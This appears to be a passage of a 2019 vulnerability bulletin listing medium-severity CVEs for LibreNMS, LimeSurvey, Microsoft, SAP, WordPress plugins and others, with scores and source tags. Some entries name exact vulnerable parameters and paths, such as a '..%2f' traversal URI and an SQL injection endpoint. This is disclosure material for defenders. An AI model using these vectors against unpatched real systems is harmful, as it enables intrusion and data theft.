MISClibrenms -- librenms An issue was discovered in LibreNMS 1.50.1. The scripts that handle graphing options (includes/html/graphs/common.inc.php and includes/html/graphs/graphs.inc.php) do not sufficiently validate or encode several fields of user supplied input. Some parameters are filtered with mysqli_real_escape_string, which is only useful for preventing SQL injection attacks; other parameters are unfiltered. This allows an attacker to inject RRDtool syntax with newline characters via the html/graph.php and html/graph-realtime.php scripts. RRDtool syntax is quite versatile and an attacker could leverage this to perform a number of attacks, including disclosing directory structure and filenames, disclosing file content, denial of service, or writing arbitrary files. NOTE: relative to CVE-2019-10665, this requires authentication and the pathnames differ. 2019-09-09 6.5 CVE-2019-12463
MISClibrenms -- librenms An issue was discovered in LibreNMS 1.50.1. An authenticated user can perform a directory traversal attack against the /pdf.php file with a partial filename in the report parameter, to cause local file inclusion resulting in code execution. 2019-09-09 6.0 CVE-2019-12464
MISClibrenms -- librenms An issue was discovered in LibreNMS 1.50.1. A SQL injection flaw was identified in the ajax_rulesuggest.php file where the term parameter is used insecurely in a database query for showing columns of a table, as demonstrated by an ajax_rulesuggest.php?debug=1&term= request. 2019-09-09 5.5 CVE-2019-12465
MISClibslirp_project -- libslirp libslirp 4.0.0, as used in QEMU 4.1.0, has a use-after-free in ip_reass in ip_input.c. 2019-09-06 5.0 CVE-2019-15890
CONFIRM
MISCliferay -- liferay_portal Liferay Portal through 7.2.0 GA1 allows XSS via a journal article title to journal_article/page.jsp in journal/journal-taglib. 2019-09-09 4.3 CVE-2019-16147
MISClimesurvey -- limesurvey An XML injection vulnerability was found in Limesurvey before 3.17.14 that allows remote attackers to import specially crafted XML files and execute code or compromise data integrity. 2019-09-09 6.8 CVE-2019-16174
MISC
MISClimesurvey -- limesurvey A clickjacking vulnerability was found in Limesurvey before 3.17.14. 2019-09-09 4.3 CVE-2019-16175
MISC
MISClimesurvey -- limesurvey A path disclosure vulnerability was found in Limesurvey before 3.17.14 that allows a remote attacker to discover the path to the application in the filesystem. 2019-09-09 5.0 CVE-2019-16176
MISC
MISClimesurvey -- limesurvey In Limesurvey before 3.17.14, the entire database is exposed through browser caching. 2019-09-09 5.0 CVE-2019-16177
MISC
MISClimesurvey -- limesurvey Limesurvey before 3.17.14 does not enforce SSL/TLS usage in the default configuration. 2019-09-09 5.0 CVE-2019-16179
MISC
MISClimesurvey -- limesurvey Limesurvey before 3.17.14 allows remote attackers to bruteforce the login form and enumerate usernames when the LDAP authentication method is used. 2019-09-09 5.0 CVE-2019-16180
MISC
MISClimesurvey -- limesurvey In Limesurvey before 3.17.14, admin users can mark other users' notifications as read. 2019-09-09 4.0 CVE-2019-16181
MISC
MISClimesurvey -- limesurvey A reflected cross-site scripting (XSS) vulnerability was found in Limesurvey before 3.17.14 that allows remote attackers to inject arbitrary web script or HTML via extensions of uploaded files. 2019-09-09 4.3 CVE-2019-16182
MISC
MISClimesurvey -- limesurvey In Limesurvey before 3.17.14, admin users can run an integrity check without proper permissions. 2019-09-09 4.0 CVE-2019-16183
MISC
MISClimesurvey -- limesurvey In Limesurvey before 3.17.14, admin users can view, update, or delete reserved menu entries without proper permissions. 2019-09-09 6.5 CVE-2019-16185
MISC
MISClimesurvey -- limesurvey In Limesurvey before 3.17.14, admin users can access the plugin manager without proper permissions. 2019-09-09 6.5 CVE-2019-16186
MISC
MISClimesurvey -- limesurvey Limesurvey before 3.17.14 uses an anti-CSRF cookie without the HttpOnly flag, which allows attackers to access a cookie value via a client-side script. 2019-09-09 5.0 CVE-2019-16187
MISC
MISCmagicfields -- magic_fields The magic-fields plugin before 1.7.2 for WordPress has XSS via the custom-write-panel-id parameter. 2019-09-10 4.3 CVE-2017-18609
MISC
MISCmagicfields -- magic_fields The magic-fields plugin before 1.7.2 for WordPress has XSS via the RCCWP_CreateCustomFieldPage.php custom-group-id parameter. 2019-09-10 4.3 CVE-2017-18610
MISC
MISCmagicfields -- magic_fields The magic-fields plugin before 1.7.2 for WordPress has XSS via the RCCWP_CreateCustomFieldPage.php custom-field-css parameter. 2019-09-10 4.3 CVE-2017-18611
MISC
MISCmautic -- mautic An issue was discovered in Mautic 2.13.1. There is Stored XSS via the authorUrl field in config.json. 2019-09-06 4.3 CVE-2018-11198
MISC
CONFIRMmcafee -- active_response McAfee Web Gateway (MWG) earlier than 7.8.2.13 is vulnerable to a remote attacker exploiting CVE-2019-9511, potentially leading to a denial of service. This affects the scanning proxies. 2019-09-11 5.0 CVE-2019-3643
CONFIRMmcafee -- active_response McAfee Web Gateway (MWG) earlier than 7.8.2.13 is vulnerable to a remote attacker exploiting CVE-2019-9517, potentially leading to a denial of service. This affects the scanning proxies. 2019-09-11 5.0 CVE-2019-3644
CONFIRMmcafee -- web_gateway Reflected Cross Site Scripting vulnerability in Administrators web console in McAfee Web Gateway (MWG) 7.8.x prior to 7.8.2.13 allows remote attackers to collect sensitive information or execute commands with the MWG administrator's credentials via tricking the administrator to click on a carefully constructed malicious link. 2019-09-12 4.3 CVE-2019-3638
CONFIRMmendix -- mendix In Mendix 7.23.5 and earlier, issue in XML import mappings allow DOCTYPE declarations in the XML input that is potentially unsafe. 2019-09-10 5.0 CVE-2019-12996
CONFIRMmicrofocus -- service_manager HTTP cookie in Micro Focus Service manager, Versions 9.30, 9.31, 9.32, 9.33, 9.34, 9.35, 9.40, 9.41, 9.50, 9.51, 9.52, 9.60, 9.61, 9.62. And Micro Focus Service Manager Chat Server, versions 9.41, 9.50, 9.51, 9.52, 9.60, 9.61, 9.62. And Micro Focus Service Manager Chat Service 9.41, 9.50, 9.51, 9.52, 9.60, 9.61, 9.62. 2019-09-10 5.0 CVE-2019-11668
CONFIRMmicrofocus -- service_manager Modifiable read only check box In Micro Focus Service Manager, versions 9.60p1, 9.61, 9.62. This vulnerability could be exploited to allow unauthorized modification of data. 2019-09-10 5.0 CVE-2019-11669
CONFIRMmicrosoft -- .net_core A denial of service vulnerability exists when .NET Core improperly handles web requests, aka '.NET Core Denial of Service Vulnerability'. 2019-09-11 5.0 CVE-2019-1301
MISCmicrosoft -- asp.net_core An elevation of privilege vulnerability exists when a ASP.NET Core web application, created using vulnerable project templates, fails to properly sanitize web requests, aka 'ASP.NET Core Elevation Of Privilege Vulnerability'. 2019-09-11 6.8 CVE-2019-1302
MISCmicrosoft -- edge A security feature bypass vulnerability exists when Microsoft Browsers fail to validate the correct Security Zone of requests for specific URLs, aka 'Microsoft Browser Security Feature Bypass Vulnerability'. 2019-09-11 4.3 CVE-2019-1220
MISCmicrosoft -- edge An information disclosure vulnerability exists when Microsoft Edge based on Edge HTML improperly handles objects in memory, aka 'Microsoft Edge based on Edge HTML Information Disclosure Vulnerability'. 2019-09-11 4.3 CVE-2019-1299
MISCmicrosoft -- excel An information disclosure vulnerability exists when Microsoft Excel improperly discloses the contents of its memory, aka 'Microsoft Excel Information Disclosure Vulnerability'. 2019-09-11 4.3 CVE-2019-1263
MISCmicrosoft -- exchange_server A spoofing vulnerability exists in Microsoft Exchange Server when Outlook Web App (OWA) fails to properly handle web requests, aka 'Microsoft Exchange Spoofing Vulnerability'. 2019-09-11 4.3 CVE-2019-1266
MISCmicrosoft -- lync An information disclosure vulnerability exists in Lync 2013, aka 'Lync 2013 Information Disclosure Vulnerability'. 2019-09-11 4.3 CVE-2019-1209
MISCmicrosoft -- office A security feature bypass vulnerability exists when Microsoft Office improperly handles input, aka 'Microsoft Office Security Feature Bypass Vulnerability'. 2019-09-11 6.8 CVE-2019-1264
MISCmicrosoft -- project_rome An information disclosure vulnerability exists in the way Rome SDK handles server SSL/TLS certificate validation, aka 'Rome SDK Information Disclosure Vulnerability'. 2019-09-11 4.3 CVE-2019-1231
MISCmicrosoft -- sharepoint_enterprise_server A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1295, CVE-2019-1296. 2019-09-11 6.5 CVE-2019-1257
MISCmicrosoft -- sharepoint_enterprise_server An elevation of privilege vulnerability exists in Microsoft SharePoint, aka 'Microsoft SharePoint Elevation of Privilege Vulnerability'. 2019-09-11 4.0 CVE-2019-1260
MISCmicrosoft -- sharepoint_enterprise_server A spoofing vulnerability exists in Microsoft SharePoint when it improperly handles requests to authorize applications, resulting in cross-site request forgery (CSRF).To exploit this vulnerability, an attacker would need to create a page specifically designed to cause a cross-site request, aka 'Microsoft SharePoint Spoofing Vulnerability'. This CVE ID is unique from CVE-2019-1259. 2019-09-11 6.8 CVE-2019-1261
MISCmicrosoft -- sharepoint_enterprise_server A remote code execution vulnerability exists in Microsoft SharePoint where APIs aren't properly protected from unsafe data input, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1257, CVE-2019-1296. 2019-09-11 6.5 CVE-2019-1295
MISCmicrosoft -- sharepoint_enterprise_server A remote code execution vulnerability exists in Microsoft SharePoint where APIs aren't properly protected from unsafe data input, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1257, CVE-2019-1295. 2019-09-11 6.5 CVE-2019-1296
MISCmicrosoft -- sharepoint_foundation A spoofing vulnerability exists in Microsoft SharePoint when it improperly handles requests to authorize applications, resulting in cross-site request forgery (CSRF).To exploit this vulnerability, an attacker would need to create a page specifically designed to cause a cross-site request, aka 'Microsoft SharePoint Spoofing Vulnerability'. This CVE ID is unique from CVE-2019-1261. 2019-09-11 6.8 CVE-2019-1259
MISCmicrosoft -- visual_studio An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly impersonates certain file operations, aka 'Diagnostics Hub Standard Collector Service Elevation of Privilege Vulnerability'. 2019-09-11 4.6 CVE-2019-1232
MISCmicrosoft -- windows_10 A denial of service vulnerability exists when Microsoft Hyper-V on a host server fails to properly validate input from a privileged user on a guest operating system, aka 'Windows Hyper-V Denial of Service Vulnerability'. 2019-09-11 5.5 CVE-2019-0928
MISCmicrosoft -- windows_10 An information disclosure vulnerability exists when DirectWrite improperly discloses the contents of its memory, aka 'DirectWrite Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2019-1245, CVE-2019-1251. 2019-09-11 4.3 CVE-2019-1244
MISCmicrosoft -- windows_10 An information disclosure vulnerability exists when DirectWrite improperly discloses the contents of its memory, aka 'DirectWrite Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2019-1244, CVE-2019-1251. 2019-09-11 4.3 CVE-2019-1245
MISCmicrosoft -- windows_10 An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory, aka 'Windows GDI Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2019-1286. 2019-09-11 4.3 CVE-2019-1252
MISCmicrosoft -- windows_10 An elevation of privilege vulnerability exists in Windows Audio Service when a malformed parameter is processed, aka 'Windows Audio Service Elevation of Privilege Vulnerability'. 2019-09-11 4.6 CVE-2019-1277
MISCmicrosoft -- windows_10 An elevation of privilege vulnerability exists in the way that the unistore.dll handles objects in memory, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1215, CVE-2019-1253, CVE-2019-1303. 2019-09-11 4.6 CVE-2019-1278
MISCmicrosoft -- windows_10 An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory, aka 'Windows GDI Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2019-1252. 2019-09-11 4.3 CVE-2019-1286
MISCmicrosoft -- windows_10 An elevation of privilege vulnerability exists in the way that the Windows Network Connectivity Assistant handles objects in memory, aka 'Windows Network Connectivity Assistant Elevation of Privilege Vulnerability'. 2019-09-11 4.6 CVE-2019-1287
MISCmicrosoft -- windows_10 A denial of service vulnerability exists when Windows improperly handles objects in memory, aka 'Windows Denial of Service Vulnerability'. 2019-09-11 6.8 CVE-2019-1292
MISCmicrosoft -- yammer A security feature bypass vulnerability exists when Microsoft Yammer App for Android fails to apply the correct Intune MAM Policy.This could allow an attacker to perform functions that are restricted by Intune Policy.The security update addresses the vulnerability by correcting the way the policy is applied to Yammer App., aka 'Microsoft Yammer Security Feature Bypass Vulnerability'. 2019-09-11 5.0 CVE-2019-1265
MISCmisp -- misp MISP before 2.4.115 allows privilege escalation in certain situations. After updating to 2.4.115, escalation attempts are blocked by the __checkLoggedActions function with a "This could be an indication of an attempted privilege escalation on older vulnerable versions of MISP (<2.4.115)" message. 2019-09-10 4.0 CVE-2019-16202
CONFIRM
MISC
MISCmyhtml_project -- myhtml MyHTML through 4.0.5 has a NULL pointer dereference in myhtml_tree_node_remove in tree.c. 2019-09-09 4.3 CVE-2019-16164
MISCnetapp -- oncommand_workflow_automation OnCommand Workflow Automation versions prior to 5.0 shipped without certain HTTP Security headers configured which could allow an attacker to obtain sensitive information via unspecified vectors. 2019-09-10 5.0 CVE-2019-5503
CONFIRMnetattingo -- wp-whois-domain The wp-whois-domain plugin 1.0.0 for WordPress has XSS via the pages/func-whois.php domain parameter. 2019-09-13 4.3 CVE-2017-18612
MISC
MISCnetgear -- wnr2000_firmware An exploitable denial-of-service vulnerability exists in the session handling functionality of the NETGEAR N300 (WNR2000v5 with Firmware Version V1.0.0.70) HTTP server. An HTTP request with an empty User-Agent string sent to a page requiring authentication can cause a null pointer dereference, resulting in the HTTP service crashing. An unauthenticated attacker can send a specially crafted HTTP request to trigger this vulnerability. 2019-09-11 5.0 CVE-2019-5054
MISCnetgear -- wnr2000_firmware An exploitable denial-of-service vulnerability exists in the Host Access Point Daemon (hostapd) on the NETGEAR N300 (WNR2000v5 with Firmware Version V1.0.0.70) wireless router. A SOAP request sent in an invalid sequence to the <WFAWLANConfig:1#PutMessage> service can cause a null pointer dereference, resulting in the hostapd service crashing. An unauthenticated attacker can send a specially-crafted SOAP request to trigger this vulnerability. 2019-09-11 5.0 CVE-2019-5055
MISCnic -- bird BIRD Internet Routing Daemon 1.6.x through 1.6.7 and 2.x through 2.0.5 has a stack-based buffer overflow. The BGP daemon's support for RFC 8203 administrative shutdown communication messages included an incorrect logical expression when checking the validity of an input message. Sending a shutdown communication with a sufficient message length causes a four-byte overflow to occur while processing the message, where two of the overflow bytes are attacker-controlled and two are fixed. 2019-09-09 5.0 CVE-2019-16159
MISC
MISC
MISC
MISC
MISC
MISCntt-east -- pr-400ki_firmware Cross-site request forgery (CSRF) vulnerability in Hikari Denwa router/Home GateWay (Hikari Denwa router/Home GateWay provided by NIPPON TELEGRAPH AND TELEPHONE EAST CORPORATION PR-S300NE/RT-S300NE/RV-S340NE firmware version Ver. 19.41 and earlier, PR-S300HI/RT-S300HI/RV-S340HI firmware version Ver.19.01.0005 and earlier, PR-S300SE/RT-S300SE/RV-S340SE firmware version Ver.19.40 and earlier, PR-400NE/RT-400NE/RV-440NE firmware version Ver.7.42 and earlier, PR-400KI/RT-400KI/RV-440KI firmware version Ver.07.00.1010 and earlier, PR-400MI/RT-400MI/RV-440MI firmware version Ver. 07.00.1012 and earlier, PR-500KI/RT-500KI firmware version Ver.01.00.0090 and earlier, RS-500KI firmware version Ver.01.00.0070 and earlier, PR-500MI/RT-500MI firmware version Ver.01.01.0014 and earlier, and RS-500MI firmware version Ver.03.01.0019 and earlier, and Hikari Denwa router/Home GateWay provided by NIPPON TELEGRAPH AND TELEPHONE WEST CORPORATION PR-S300NE/RT-S300NE/RV-S340NE firmware version Ver. 19.41 and earlier, PR-S300HI/RT-S300HI/RV-S340HI firmware version Ver.19.01.0005 and earlier, PR-S300SE/RT-S300SE/RV-S340SE firmware version Ver.19.40 and earlier, PR-400NE/RT-400NE/RV-440NE firmware version Ver.7.42 and earlier, PR-400KI/RT-400KI/RV-440KI firmware version Ver.07.00.1010 and earlier, PR-400MI/RT-400MI/RV-440MI firmware version Ver. 07.00.1012 and earlier, PR-500KI/RT-500KI firmware version Ver.01.00.0090 and earlier, and PR-500MI/RT-500MI firmware version Ver.01.01.0011 and earlier) allow remote attackers to hijack the authentication of administrators via unspecified vectors. 2019-09-12 6.8 CVE-2019-5986
MISC
CONFIRMoceanwp -- ocean_extra includes/wizard/wizard.php in the Ocean Extra plugin through 1.5.8 for WordPress allows unauthenticated options changes and injection of a Cascading Style Sheets (CSS) token sequence. 2019-09-11 5.0 CVE-2019-16250
MISConce_cell_project -- once_cell An issue was discovered in the once_cell crate before 1.0.1 for Rust. There is a panic during initialization of Lazy. 2019-09-09 5.0 CVE-2019-16141
MISC
MISConiguruma_project -- oniguruma Oniguruma before 6.9.3 allows Stack Exhaustion in regcomp.c because of recursion in regparse.c. 2019-09-09 5.0 CVE-2019-16163
MISC
MISC
MISC
MLISTopensc_project -- opensc An issue was discovered in the pam_p11 component 0.2.0 and 0.3.0 for OpenSC. If a smart card creates a signature with a length longer than 256 bytes, this triggers a buffer overflow. This may be the case for RSA keys with 4096 bits depending on the signature scheme. 2019-09-06 5.0 CVE-2019-16058
MLIST
MISCopenssl -- openssl OpenSSL 1.1.1 introduced a rewritten random number generator (RNG). This was intended to include protection in the event of a fork() system call in order to ensure that the parent and child processes did not share the same RNG state. However this protection was not being used in the default case. A partial mitigation for this issue is that the output from a high precision timer is mixed into the RNG state so the likelihood of a parent and child process sharing state is significantly reduced. If an application already calls OPENSSL_init_crypto() explicitly using OPENSSL_INIT_ATFORK then this problem does not occur at all. Fixed in OpenSSL 1.1.1d (Affected 1.1.1-1.1.1c). 2019-09-10 5.0 CVE-2019-1549
CONFIRM
CONFIRMopenssl -- openssl In situations where an attacker receives automated notification of the success or failure of a decryption attempt an attacker, after sending a very large number of messages to be decrypted, can recover a CMS/PKCS7 transported encryption key or decrypt any RSA encrypted message that was encrypted with the public RSA key, using a Bleichenbacher padding oracle attack. Applications are not affected if they use a certificate together with the private RSA key to the CMS_decrypt or PKCS7_decrypt functions to select the correct recipient info to decrypt. Fixed in OpenSSL 1.1.1d (Affected 1.1.1-1.1.1c). Fixed in OpenSSL 1.1.0l (Affected 1.1.0-1.1.0k). Fixed in OpenSSL 1.0.2t (Affected 1.0.2-1.0.2s). 2019-09-10 4.3 CVE-2019-1563
MISC
CONFIRM
CONFIRM
CONFIRM
BUGTRAQ
CONFIRMopmantek -- open-audit The Create Discoveries feature of Open-AudIT before 3.2.0 allows an authenticated attacker to execute arbitrary OS commands via a crafted value for a URL field. 2019-09-13 6.5 CVE-2019-16293
MISCpadrinorb -- padrino-contrib The breadcrumbs contributed module through 0.2.0 for Padrino Framework allows XSS via a caption. 2019-09-09 4.3 CVE-2019-16145
MISCpagelines -- pagelines The PageLines theme 1.1.4 for WordPress has wp-admin/admin-post.php?page=pagelines CSRF. 2019-09-13 6.8 CVE-2016-10945
MISCpanasonic -- video_insight_vms SQL injection vulnerability in the Video Insight VMS 7.3.2.5 and earlier allows remote authenticated attackers to execute arbitrary SQL commands via unspecified vectors. 2019-09-12 6.5 CVE-2019-5996
MISCphpmyadmin -- phpmyadmin A CSRF issue in phpMyAdmin 4.9.0.1 allows deletion of any server in the Setup page. 2019-09-13 5.8 CVE-2019-12922
MISC
MISC
EXPLOIT-DBphpok -- oklite framework/admin/modulec_control.php in OKLite v1.2.25 has an Arbitrary File Upload Vulnerability because a .php file from a ZIP archive can be written to /data/cache/. 2019-09-08 6.5 CVE-2019-16131
MISCphpok -- oklite An issue was discovered in OKLite v1.2.25. framework/admin/tpl_control.php allows remote attackers to delete arbitrary files via a title directory-traversal pathname followed by a crafted substring. 2019-09-08 5.5 CVE-2019-16132
MISCpicoc_project -- picoc PicoC 2.1 has a heap-based buffer overflow in StringStrcpy in cstdlib/string.c when called from ExpressionParseFunctionCall in expression.c. 2019-09-13 6.8 CVE-2019-16277
MISCpinfinity_project -- pinfinity The Pinfinity theme before 2.0 for WordPress has XSS via the s parameter. 2019-09-10 4.3 CVE-2017-18599
MISCpiwigo -- piwigo admin.php?page=notification_by_mail in Piwigo 2.9.5 has XSS via the nbm_send_html_mail, nbm_send_mail_as, nbm_send_detailed_content, nbm_complementary_mail_content, nbm_send_recent_post_dates, or param_submit parameter. This is exploitable via CSRF. 2019-09-13 6.8 CVE-2019-13363
MISC
MISC
MISC
MISCpiwigo -- piwigo admin.php?page=account_billing in Piwigo 2.9.5 has XSS via the vat_number, billing_name, company, or billing_address parameter. This is exploitable via CSRF. 2019-09-13 6.8 CVE-2019-13364
MISC
MISC
MISC
MISCplataformatec -- devise An issue was discovered in Plataformatec Devise before 4.7.1. It confirms accounts upon receiving a request with a blank confirmation_token, if a database record has a blank value in the confirmation_token column. (However, there is no scenario within Devise itself in which such database records would exist.) 2019-09-08 5.0 CVE-2019-16109
MISC
MISC
MISCpodlove -- podlove_podcast_publisher The podlove-podcasting-plugin-for-wordpress plugin before 2.3.16 for WordPress has XSS exploitable via CSRF. 2019-09-13 4.3 CVE-2016-10941
MISC
MISC
MISCpostman-smtp_project -- postman-smtp The postman-smtp plugin through 2017-10-04 for WordPress has XSS via the wp-admin/tools.php?page=postman_email_log page parameter. 2019-09-10 4.3 CVE-2017-18603
MISC
MISCpy-lmdb_project -- py-lmdb An issue was discovered in py-lmdb 0.97. mdb_node_del does not validate a memmove in the case of an unexpected node->mn_hi, leading to an invalid write operation. 2019-09-11 5.0 CVE-2019-16226
MISCpy-lmdb_project -- py-lmdb An issue was discovered in py-lmdb 0.97. There is a divide-by-zero error in the function mdb_env_open2 if mdb_env_read_header obtains a zero value for a certain size field. 2019-09-11 5.0 CVE-2019-16228
MISCpython -- python An issue was discovered in Python through 2.7.16, 3.x through 3.5.7, 3.6.x through 3.6.9, and 3.7.x through 3.7.4. The email module wrongly parses email addresses that contain multiple @ characters. An application that uses the email module and implements some kind of checks on the From/To headers of a message could be tricked into accepting an email address that should be denied. An attack may be the same as in CVE-2019-11340; however, this CVE applies to Python more generally. 2019-09-06 5.0 CVE-2019-16056
MISC
MISC
FEDORAsakailms -- sakai Sakai through 12.6 allows XSS via a chat user name. 2019-09-09 4.3 CVE-2019-16148
MISCsap -- businessobjects_business_intelligence_platform In SAP Business Objects Business Intelligence Platform, before versions 4.1, 4.2 and 4.3, some dynamic pages (like jsp) are cached, which leads to an attacker can see the sensitive information via cache and can open the dynamic pages even after logout. 2019-09-10 5.0 CVE-2019-0352
MISC
CONFIRMsap -- hana_extended_application_services Attackers may misuse an HTTP/REST endpoint of SAP HANA Extended Application Services (Advanced model), before version 1.0.118, to overload the server or retrieve information about internal network ports. 2019-09-10 5.5 CVE-2019-0363
MISC
CONFIRMsap -- hana_extended_application_services Attackers may misuse an HTTP/REST endpoint of SAP HANA Extended Application Services (Advanced model), before version 1.0.118, to enumerate open ports. 2019-09-10 4.0 CVE-2019-0364
MISC
CONFIRMsap -- netweaver_application_server_java SAP NetWeaver Application Server Java Web Container, ENGINEAPI (before versions 7.10, 7.20, 7.30, 7.31, 7.40, 7.50) and SAP-JEECOR (before versions 6.40, 7.0, 7.01), allows an attacker to inject code that can be executed by the application. An attacker could thereby control the behaviour of the application. 2019-09-10 6.5 CVE-2019-0355
MISC
CONFIRMsap -- netweaver_process_integration Under certain conditions SAP NetWeaver Process Integration Runtime Workbench ? MESSAGING and SAP_XIAF (before versions 7.31, 7.40, 7.50) allows an attacker to access information which would otherwise be restricted. 2019-09-10 4.0 CVE-2019-0356
MISC
CONFIRMsap -- supplier_relationship_management SAP Supplier Relationship Management (Master Data Management Catalog - SRM_MDM_CAT, before versions 3.73, 7.31, 7.32) does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. 2019-09-10 4.3 CVE-2019-0361
MISC
CONFIRMsapplica -- sentrifugo Sentrifugo 3.2 lacks CSRF protection. This could lead to an attacker tricking the administrator into executing arbitrary code at index.php/dashboard/viewprofile via a crafted HTML page. 2019-09-06 6.8 CVE-2019-16059
MISCsearch_exclude_project -- search_exclude search-exclude.php in the "Search Exclude" plugin before 1.2.4 for WordPress allows unauthenticated options changes. 2019-09-09 5.0 CVE-2019-15895
MISC
MISC
MISCsenecajs -- seneca Seneca < 3.9.0 contains a vulnerability that could lead to exposing environment variables to unauthorized users. 2019-09-09 5.0 CVE-2019-5483
MISCsilver-peak -- unity_edgeconnect_sd-wan_firmware Silver Peak EdgeConnect SD-WAN before 8.1.7.x allows CSRF via JSON data to a .swf file. 2019-09-08 6.8 CVE-2019-16099
MISCsilver-peak -- unity_edgeconnect_sd-wan_firmware Silver Peak EdgeConnect SD-WAN before 8.1.7.x allows remote attackers to trigger a web-interface outage via slow client-side HTTP traffic from a single source. 2019-09-08 5.0 CVE-2019-16100
MISCsilver-peak -- unity_edgeconnect_sd-wan_firmware Silver Peak EdgeConnect SD-WAN before 8.1.7.x allows remote attackers to obtain potentially sensitive stack traces by sending incorrect JSON data to the REST API, such as the rest/json/banners URI. 2019-09-08 5.0 CVE-2019-16101
MISCsilver-peak -- unity_edgeconnect_sd-wan_firmware Silver Peak EdgeConnect SD-WAN before 8.1.7.x has reflected XSS via the rest/json/configdb/download/ PATH_INFO. 2019-09-08 4.3 CVE-2019-16104
MISCsilver-peak -- unity_edgeconnect_sd-wan_firmware Silver Peak EdgeConnect SD-WAN before 8.1.7.x allows ..%2f directory traversal via a rest/json/configdb/download/ URI. 2019-09-08 4.0 CVE-2019-16105
MISCsirv -- sirv The sirv plugin before 1.3.2 for WordPress has SQL injection via the id parameter. 2019-09-13 6.5 CVE-2016-10950
MISC
MISC
MISCsitebuilder_dynamic_components_project -- sitebuilder_dynamic_components The sitebuilder-dynamic-components plugin through 1.0 for WordPress has PHP object injection via an AJAX request. 2019-09-10 5.0 CVE-2017-18604
MISC
MISCslickquiz_project -- slickquiz The slickquiz plugin through 1.3.7.1 for WordPress allows SQL Injection by Subscriber users, as demonstrated by a /wp-admin/admin.php?page=slickquiz-scores&id= or /wp-admin/admin.php?page=slickquiz-edit&id= or /wp-admin/admin.php?page=slickquiz-preview&id= URI. 2019-09-13 6.5 CVE-2019-12516
MISC
MISCslickquiz_project -- slickquiz An XSS issue was discovered in the slickquiz plugin through 1.3.7.1 for WordPress. The save_quiz_score functionality available via the /wp-admin/admin-ajax.php endpoint allows unauthenticated users to submit quiz solutions/answers, which are stored in the database and later shown in the WordPress backend for all users with at least Subscriber rights. Because the plugin does not properly validate and sanitize this data, a malicious payload in either the name or email field is executed directly within the backend at /wp-admin/admin.php?page=slickquiz across all users with the privileges of at least Subscriber. 2019-09-13 4.3 CVE-2019-12517
MISC
MISCspot -- spot.im_comments The spotim-comments plugin before 4.0.4 for WordPress has multiple XSS issues. 2019-09-10 4.3 CVE-2017-18608
MISC
MISCsqlite -- sqlite In SQLite through 3.29.0, whereLoopAddBtreeIndex in sqlite3.c can crash a browser or other application because of missing validation of a sqlite_stat1 sz field, aka a "severe division by zero in the query planner." 2019-09-09 5.0 CVE-2019-16168
MISC
MISC
MISCss-proj -- shirasagi Open redirect vulnerability in SHIRASAGI v1.7.0 and earlier allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. 2019-09-12 5.8 CVE-2019-6009
MISC
MISC
MISC
MISC
MISCsupervisord -- supervisor In supervisord in Supervisor through 4.0.2, an unauthenticated user can read log files or restart a service. WARNING: This issue will not be fixed by the maintainer. The ability to run an open server will not be removed because users often use it for local development, therefore no action will be taken. 2019-09-10 6.4 CVE-2019-12105
MISC
MISC
MISCsymonics -- libmysofa Symonics libmysofa 0.7 has an out-of-bounds read in directblockRead in hdf/fractalhead.c. 2019-09-07 5.0 CVE-2019-16091
MISCsymonics -- libmysofa Symonics libmysofa 0.7 has an invalid read in readOHDRHeaderMessageDataLayout in hdf/dataobject.c. 2019-09-07 5.0 CVE-2019-16094
MISCsymonics -- libmysofa Symonics libmysofa 0.7 has an invalid read in getDimension in hrtf/reader.c. 2019-09-07 5.0 CVE-2019-16095
MISCsysstat_project -- sysstat sysstat before 12.1.6 has memory corruption due to an Integer Overflow in remap_struct() in sa_common.c. 2019-09-09 4.3 CVE-2019-16167
MISC
MISCteammatesolutions -- teammate+ A Cross-Site Request Forgery (CSRF) vulnerability exists in TeamMate+ 21.0.0.0 that allows a remote attacker to modify application data (upload malicious/forged files on a TeamMate server, or replace existing uploaded files with malicious/forged files). The specific flaw exists within the handling of Upload/DomainObjectDocumentUpload.ashx requests because of failure to validate a CSRF token before handling a POST request. 2019-09-09 4.3 CVE-2019-10253
MISC
MISCtelegram -- telegram The "delete for" feature in Telegram before 5.11 on Android does not delete shared media files from the Telegram Images directory. In other words, there is a potentially misleading UI indication that a sender can remove a recipient's copy of a previously sent image (analogous to supported functionality in which a sender can remove a recipient's copy of a previously sent message). 2019-09-11 5.0 CVE-2019-16248
MISC
MISC
MISCtheme-fusion -- avada The avada theme before 5.1.5 for WordPress has stored XSS. 2019-09-10 4.3 CVE-2017-18606
MISCtheme-fusion -- avada The avada theme before 5.1.5 for WordPress has CSRF. 2019-09-10 6.8 CVE-2017-18607
MISCtrendmicro -- deep_security_manager Trend Micro Deep Security Manager (10.x, 11.x) and Vulnerability Protection (2.0) are vulnerable to a XML External Entity Attack. However, for the attack to be possible, the attacker must have root/admin access to a protected host which is authorized to communicate with the Deep Security Manager (DSM). 2019-09-11 4.0 CVE-2019-9488
N/Atri -- event_tickets CSV injection in the event-tickets (Event Tickets) plugin before 4.10.7.2 for WordPress exists via the "All Post> Ticketed > Attendees" Export Attendees feature. 2019-09-08 6.5 CVE-2019-16120
MISC
MISC
MISCtrust_form_project -- trust_form The trust-form plugin 2.0 for WordPress has XSS via the wp-admin/admin.php?page=trust-form-edit page parameter. 2019-09-13 4.3 CVE-2017-18613
MISC
MISCultra-prod -- wordpress_ultra_simple_paypal_shopping_cart Cross-site request forgery (CSRF) vulnerability in WordPress Ultra Simple Paypal Shopping Cart v4.4 and earlier allows remote attackers to hijack the authentication of administrators via unspecified vectors. 2019-09-12 6.8 CVE-2019-5992
